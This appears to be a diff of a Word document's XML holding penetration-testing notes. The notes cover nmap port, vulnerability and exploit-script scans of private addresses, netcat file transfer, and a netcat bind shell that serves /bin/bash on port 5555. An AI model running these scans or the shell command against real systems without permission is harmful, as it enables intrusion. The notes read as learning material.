+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ips.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> [Input]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -669,12 +1215,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sT 192.168.1.1</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.1.1</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -705,12 +1276,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sT 192.168.74.113 --reason</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.74.113 --reason</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -736,7 +1332,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sT 192.168.206.133 -p 80</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 -p 80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -751,7 +1379,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sT 192.168.206.133 -p 80,4444</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 -p 80,4444</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -766,7 +1426,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sT 192.168.206.133 -p 80-100</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 -p 80-100</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -781,7 +1473,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sT 192.168.206.133 -p 80,443,100-150,160-170</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 -p 80,443,100-150,160-170</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -796,7 +1520,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap 192.168.206.133 -p U:53,T21-25,80</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 -p U:53,T21-25,80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -811,7 +1551,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sT 192.168.206.133 -p 80-200 --exclude-ports 81</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.206.133 -p 80-200 --exclude-ports 81</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -826,7 +1598,39 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t># nmap -sT 192.168.1.1 -p 0-65535</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.1.1 -p 0-65535</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -884,12 +1688,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sT 172.30.231.207 -v</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 172.30.231.207 -v</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -902,13 +1731,47 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sT 172.30.231.207 -vv</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 172.30.231.207 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>vv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -933,14 +1796,27 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>-vv [ very verbose ]</w:t>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> [ very verbose ]</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>eg:</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>eg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -948,12 +1824,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sT 172.30.231.207</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 172.30.231.207</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -983,7 +1884,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>8080/tcp open  http-proxy</w:t>
+        <w:t>8080/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> open  http-proxy</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1001,12 +1910,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sT 172.30.231.207 -p8081 --reason</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 172.30.231.207 -p8081 --reason</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1022,7 +1956,23 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t># cd /usr/share/nmap/</w:t>
+        <w:t># cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/share/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1032,13 +1982,23 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>nmap-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>nmap-protocols</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-protocols</w:t>
       </w:r>
       <w:r>
         <w:tab/>
@@ -1066,13 +2026,47 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sT 172.30.231.207 -Pn</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 172.30.231.207 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Pn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1117,12 +2111,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap -sS target</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1158,19 +2177,67 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t># cd /usr/share/nmap/scripts/</w:t>
+        <w:t># cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/share/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/scripts/</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"># nmap -sSV --script=rdp-vuln-ms12-020 target </w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sSV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --script=rdp-vuln-ms12-020 target </w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"># nmap -sSVC target </w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sSVC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> target </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1192,12 +2259,44 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t># nmap -sSV --script vuln target</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t># nmap -sSV --script exploit target</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sSV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --script vuln target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sSV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> --script exploit target</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1231,7 +2330,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>/cgi-bin/status</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cgi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-bin/status</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1263,7 +2370,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Syntax: nc [options] host port</w:t>
+        <w:t xml:space="preserve">Syntax: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> [options] host port</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1291,12 +2406,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">nc -lvp 8080 </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lvp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8080 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1314,12 +2454,21 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc machine1_IP 8080 -v</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> machine1_IP 8080 -v</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1342,12 +2491,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc -lvp 8080 &lt; data.txt</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lvp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8080 &lt; data.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1365,12 +2539,21 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc 127.0.0.1 8080 -v &gt; send.txt</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 127.0.0.1 8080 -v &gt; send.txt</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1394,12 +2577,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc -n -v -lp 5555 -e /bin/bash</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -n -v -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5555 -e /bin/bash</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1411,12 +2619,37 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc -nv 127.0.0.1 5555</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 127.0.0.1 5555</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1451,7 +2684,23 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>we took access through vulnerable web and start listening  netcat on there terminal</w:t>
+        <w:t xml:space="preserve">we took access through vulnerable web and start listening  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>there</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal</w:t>
       </w:r>
     </w:p>
     <w:p>
